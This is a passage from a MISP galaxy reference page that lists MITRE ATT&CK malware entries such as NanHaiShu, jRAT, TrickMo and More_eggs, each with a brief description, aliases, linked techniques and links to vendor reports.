The tag is: misp-galaxy:mitre-malware="NDiskMonitor - S0272"

NDiskMonitor - S0272 is also known as:

  • NDiskMonitor

Table 7587. Table References

Links

https://attack.mitre.org/software/S0272

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

NanHaiShu - S0228

[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)

The tag is: misp-galaxy:mitre-malware="NanHaiShu - S0228"

NanHaiShu - S0228 is also known as:

  • NanHaiShu

NanHaiShu - S0228 has relationships with:

  • similar: misp-galaxy:tool="NanHaiShu" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7588. Table References

Links

https://attack.mitre.org/software/S0228

https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

MacSpy - S0282

[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="MacSpy - S0282"

MacSpy - S0282 is also known as:

  • MacSpy

Table 7589. Table References

Links

https://attack.mitre.org/software/S0282

https://objective-see.com/blog/blog_0x25.html

AndroRAT - S0292

[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)

The tag is: misp-galaxy:mitre-malware="AndroRAT - S0292"

AndroRAT - S0292 has relationships with:

  • similar: misp-galaxy:malpedia="AndroRAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

Table 7590. Table References

Links

https://attack.mitre.org/software/S0292

https://blog.lookout.com/blog/2016/05/25/spoofed-apps/

Orz - S0229

[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="Orz - S0229"

Orz - S0229 is also known as:

  • Orz

  • AIRBREAK

Orz - S0229 has relationships with:

  • similar: misp-galaxy:malpedia="AIRBREAK" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7591. Table References

Links

https://attack.mitre.org/software/S0229

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

Charger - S0323

[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals contacts and SMS messages from the user’s device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)

The tag is: misp-galaxy:mitre-malware="Charger - S0323"

Charger - S0323 is also known as:

  • Charger

Charger - S0323 has relationships with:

  • similar: misp-galaxy:malpedia="Charger" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 7592. Table References

Links

http://blog.checkpoint.com/2017/01/24/charger-malware/

https://attack.mitre.org/software/S0323

MURKYTOP - S0233

[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="MURKYTOP - S0233"

MURKYTOP - S0233 is also known as:

  • MURKYTOP

MURKYTOP - S0233 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 7593. Table References

Links

https://attack.mitre.org/software/S0233

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

Bread - S0432

[Bread](https://attack.mitre.org/software/S0432) was a large-scale billing fraud malware family known for employing many different cloaking and obfuscation techniques in an attempt to continuously evade Google Play Store’s malware detection. 1,700 unique Bread apps were detected and removed from the Google Play Store before being downloaded by users.(Citation: Google Bread)

The tag is: misp-galaxy:mitre-malware="Bread - S0432"

Bread - S0432 is also known as:

  • Bread

  • Joker

Table 7594. Table References

Links

https://attack.mitre.org/software/S0432

https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html

Bandook - S0234

[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as "Operation Manul".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)

The tag is: misp-galaxy:mitre-malware="Bandook - S0234"

Bandook - S0234 is also known as:

  • Bandook

Table 7595. Table References

Links

https://attack.mitre.org/software/S0234

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

https://research.checkpoint.com/2020/bandook-signed-delivered/

https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf

DealersChoice - S0243

[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)

The tag is: misp-galaxy:mitre-malware="DealersChoice - S0243"

DealersChoice - S0243 is also known as:

  • DealersChoice

Table 7596. Table References

Links

https://attack.mitre.org/software/S0243

https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/

SpyDealer - S0324

[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)

The tag is: misp-galaxy:mitre-malware="SpyDealer - S0324"

SpyDealer - S0324 is also known as:

  • SpyDealer

Table 7597. Table References

Links

https://attack.mitre.org/software/S0324

https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/

GreyEnergy - S0342

[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be its successor.(Citation: ESET GreyEnergy Oct 2018)

The tag is: misp-galaxy:mitre-malware="GreyEnergy - S0342"

GreyEnergy - S0342 is also known as:

  • GreyEnergy

Table 7598. Table References

Links

https://attack.mitre.org/software/S0342

https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf

Ginp - S0423

[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)

The tag is: misp-galaxy:mitre-malware="Ginp - S0423"

Ginp - S0423 is also known as:

  • Ginp

Table 7599. Table References

Links

https://attack.mitre.org/software/S0423

https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html

CrossRAT - S0235

[CrossRAT](https://attack.mitre.org/software/S0235) is a cross-platform RAT.

The tag is: misp-galaxy:mitre-malware="CrossRAT - S0235"

CrossRAT - S0235 is also known as:

  • CrossRAT

Table 7600. Table References

Links

https://attack.mitre.org/software/S0235

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

RunningRAT - S0253

[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="RunningRAT - S0253"

RunningRAT - S0253 is also known as:

  • RunningRAT

Table 7601. Table References

Links

https://attack.mitre.org/software/S0253

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Judy - S0325

[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)

The tag is: misp-galaxy:mitre-malware="Judy - S0325"

Table 7602. Table References

Links

https://attack.mitre.org/software/S0325

https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/

Lucifer - S0532

[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)

The tag is: misp-galaxy:mitre-malware="Lucifer - S0532"

Lucifer - S0532 is also known as:

  • Lucifer

Table 7603. Table References

Links

https://attack.mitre.org/software/S0532

https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/

TYPEFRAME - S0263

[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)

The tag is: misp-galaxy:mitre-malware="TYPEFRAME - S0263"

TYPEFRAME - S0263 is also known as:

  • TYPEFRAME

Table 7604. Table References

Links

https://attack.mitre.org/software/S0263

https://www.us-cert.gov/ncas/analysis-reports/AR18-165A

GrimAgent - S0632

[GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group IB GrimAgent July 2021)

The tag is: misp-galaxy:mitre-malware="GrimAgent - S0632"

GrimAgent - S0632 is also known as:

  • GrimAgent

Table 7605. Table References

Links

https://attack.mitre.org/software/S0632

https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer

RedDrop - S0326

[RedDrop](https://attack.mitre.org/software/S0326) is an Android malware family that exfiltrates sensitive data from devices. (Citation: Wandera-RedDrop)

The tag is: misp-galaxy:mitre-malware="RedDrop - S0326"

RedDrop - S0326 is also known as:

  • RedDrop

Table 7606. Table References

Links

https://attack.mitre.org/software/S0326

https://www.wandera.com/reddrop-malware/

Kwampirs - S0236

[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)

The tag is: misp-galaxy:mitre-malware="Kwampirs - S0236"

Kwampirs - S0236 is also known as:

  • Kwampirs

Table 7607. Table References

Links

https://attack.mitre.org/software/S0236

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

Siloscape - S0623

[Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)

The tag is: misp-galaxy:mitre-malware="Siloscape - S0623"

Siloscape - S0623 is also known as:

  • Siloscape

Table 7608. Table References

Links

https://attack.mitre.org/software/S0623

https://unit42.paloaltonetworks.com/siloscape/

GravityRAT - S0237

[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organizations and entities in India. (Citation: Talos GravityRAT)

The tag is: misp-galaxy:mitre-malware="GravityRAT - S0237"

GravityRAT - S0237 is also known as:

  • GravityRAT

Table 7609. Table References

Links

https://attack.mitre.org/software/S0237

https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

LockerGoga - S0372

[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)

The tag is: misp-galaxy:mitre-malware="LockerGoga - S0372"

LockerGoga - S0372 is also known as:

  • LockerGoga

Table 7610. Table References

Links

https://attack.mitre.org/software/S0372

https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/

Socksbot - S0273

[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)

The tag is: misp-galaxy:mitre-malware="Socksbot - S0273"

Socksbot - S0273 is also known as:

  • Socksbot

Table 7611. Table References

Links

https://attack.mitre.org/software/S0273

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

Skygofree - S0327

[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)

The tag is: misp-galaxy:mitre-malware="Skygofree - S0327"

Skygofree - S0327 is also known as:

  • Skygofree

Table 7612. Table References

Links

https://attack.mitre.org/software/S0327

https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

jRAT - S0283

[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)

The tag is: misp-galaxy:mitre-malware="jRAT - S0283"

jRAT - S0283 is also known as:

  • jRAT

  • JSocket

  • AlienSpy

  • Frutas

  • Sockrat

  • Unrecom

  • jFrutas

  • Adwind

  • jBiFrost

  • Trojan.Maljava

Table 7613. Table References

Links

https://attack.mitre.org/software/S0283

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques

ServHelper - S0382

[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)

The tag is: misp-galaxy:mitre-malware="ServHelper - S0382"

ServHelper - S0382 is also known as:

  • ServHelper

Table 7614. Table References

Links

https://attack.mitre.org/software/S0382

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

Proxysvc - S0238

[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)

The tag is: misp-galaxy:mitre-malware="Proxysvc - S0238"

Proxysvc - S0238 is also known as:

  • Proxysvc

Table 7615. Table References

Links

https://attack.mitre.org/software/S0238

https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/

BrainTest - S0293

[BrainTest](https://attack.mitre.org/software/S0293) is a family of Android malware. (Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)

The tag is: misp-galaxy:mitre-malware="BrainTest - S0293"

BrainTest - S0293 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 7616. Table References

Links

http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/

https://attack.mitre.org/software/S0293

https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/

Bankshot - S0239

[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)

The tag is: misp-galaxy:mitre-malware="Bankshot - S0239"

Bankshot - S0239 is also known as:

  • Bankshot

  • Trojan Manuscript

Table 7617. Table References

Links

https://attack.mitre.org/software/S0239

https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/

Tangelo - S0329

[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)

The tag is: misp-galaxy:mitre-malware="Tangelo - S0329"

Tangelo - S0329 is also known as:

  • Tangelo

Table 7618. Table References

Links

https://attack.mitre.org/software/S0329

https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf

VBShower - S0442

[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)

The tag is: misp-galaxy:mitre-malware="VBShower - S0442"

VBShower - S0442 is also known as:

  • VBShower

Table 7619. Table References

Links

https://attack.mitre.org/software/S0442

https://securelist.com/recent-cloud-atlas-activity/92016/

Comnie - S0244

[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)

The tag is: misp-galaxy:mitre-malware="Comnie - S0244"

Comnie - S0244 is also known as:

  • Comnie

Table 7620. Table References

Links

https://attack.mitre.org/software/S0244

https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/

Triada - S0424

[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)

The tag is: misp-galaxy:mitre-malware="Triada - S0424"

Triada - S0424 is also known as:

  • Triada

Table 7621. Table References

Links

https://attack.mitre.org/software/S0424

https://www.kaspersky.com/blog/triada-trojan/11481/

BADCALL - S0245

[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)

The tag is: misp-galaxy:mitre-malware="BADCALL - S0245"

BADCALL - S0245 is also known as:

  • BADCALL

Table 7622. Table References

Links

https://attack.mitre.org/software/S0245

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF

PLAINTEE - S0254

[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-malware="PLAINTEE - S0254"

PLAINTEE - S0254 is also known as:

  • PLAINTEE

Table 7623. Table References

Links

https://attack.mitre.org/software/S0254

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

USBferry - S0452

[USBferry](https://attack.mitre.org/software/S0452) is an information-stealing malware that has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which make it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)

The tag is: misp-galaxy:mitre-malware="USBferry - S0452"

USBferry - S0452 is also known as:

  • USBferry

Table 7624. Table References

Links

https://attack.mitre.org/software/S0452

https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf

CARROTBAT - S0462

[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-malware="CARROTBAT - S0462"

CARROTBAT - S0462 is also known as:

  • CARROTBAT

Table 7625. Table References

Links

https://attack.mitre.org/software/S0462

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/

HARDRAIN - S0246

[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)

The tag is: misp-galaxy:mitre-malware="HARDRAIN - S0246"

HARDRAIN - S0246 is also known as:

  • HARDRAIN

Table 7626. Table References

Links

https://attack.mitre.org/software/S0246

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf

BADFLICK - S0642

[BADFLICK](https://attack.mitre.org/software/S0642) is a backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)

The tag is: misp-galaxy:mitre-malware="BADFLICK - S0642"

BADFLICK - S0642 is also known as:

  • BADFLICK

Table 7627. Table References

Links

https://attack.mitre.org/software/S0642

https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

OopsIE - S0264

[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)

The tag is: misp-galaxy:mitre-malware="OopsIE - S0264"

OopsIE - S0264 is also known as:

  • OopsIE

Table 7628. Table References

Links

https://attack.mitre.org/software/S0264

https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/

https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/

Ecipekac - S0624

[Ecipekac](https://attack.mitre.org/software/S0624) is a multi-layer loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2019 including use as a loader for [P8RAT](https://attack.mitre.org/software/S0626), [SodaMaster](https://attack.mitre.org/software/S0627), and [FYAnti](https://attack.mitre.org/software/S0628).(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="Ecipekac - S0624"

Ecipekac - S0624 is also known as:

  • Ecipekac

  • HEAVYHAND

  • SigLoader

  • DESLoader

Table 7629. Table References

Links

https://attack.mitre.org/software/S0624

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

NavRAT - S0247

[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)

The tag is: misp-galaxy:mitre-malware="NavRAT - S0247"

NavRAT - S0247 is also known as:

  • NavRAT

Table 7630. Table References

Links

https://attack.mitre.org/software/S0247

https://blog.talosintelligence.com/2018/05/navrat.html

Calisto - S0274

[Calisto](https://attack.mitre.org/software/S0274) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://attack.mitre.org/software/S0274) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)

The tag is: misp-galaxy:mitre-malware="Calisto - S0274"

Calisto - S0274 is also known as:

  • Calisto

Table 7631. Table References

Links

https://attack.mitre.org/software/S0274

https://securelist.com/calisto-trojan-for-macos/86543/

https://web.archive.org/web/20190111082249/https://www.symantec.com/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days

TrickMo - S0427

[TrickMo](https://attack.mitre.org/software/S0427) is a 2FA-bypass mobile banking trojan, most likely distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has primarily targeted users located in Germany.(Citation: SecurityIntelligence TrickMo)

[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo)

The tag is: misp-galaxy:mitre-malware="TrickMo - S0427"

TrickMo - S0427 is also known as:

  • TrickMo

Table 7632. Table References

Links

https://attack.mitre.org/software/S0427

https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/

down_new - S0472

[down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="down_new - S0472"

down_new - S0472 is also known as:

  • down_new

Table 7633. Table References

Links

https://attack.mitre.org/software/S0472

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

PoetRAT - S0428

[PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020)

The tag is: misp-galaxy:mitre-malware="PoetRAT - S0428"

PoetRAT - S0428 is also known as:

  • PoetRAT

Table 7634. Table References

Links

https://attack.mitre.org/software/S0428

https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html

https://blog.talosintelligence.com/2020/10/poetrat-update.html

https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770

Bundlore - S0482

[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)

The tag is: misp-galaxy:mitre-malware="Bundlore - S0482"

Bundlore - S0482 is also known as:

  • Bundlore

  • OSX.Bundlore

Table 7635. Table References

Links

https://attack.mitre.org/software/S0482

https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/

More_eggs - S0284

[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)

The tag is: misp-galaxy:mitre-malware="More_eggs - S0284"

More_eggs - S0284 is also known as:

  • More_eggs

  • SKID

  • Terra Loader

  • SpicyOmelette

Table 7636. Table References

Links

https://attack.mitre.org/software/S0284

https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

yty - S0248

[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)

The tag is: misp-galaxy:mitre-malware="yty - S0248"

yty - S0248 is also known as:

  • yty

Table 7637. Table References

Links

https://attack.mitre.org/software/S0248

https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/

ShiftyBug - S0294

[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, and Kemoge, though it is not believed that all of these families were created by the same group. (Citation: Lookout-Adware)

The tag is: misp-galaxy:mitre-malware="ShiftyBug - S0294"

ShiftyBug - S0294 has relationships with:

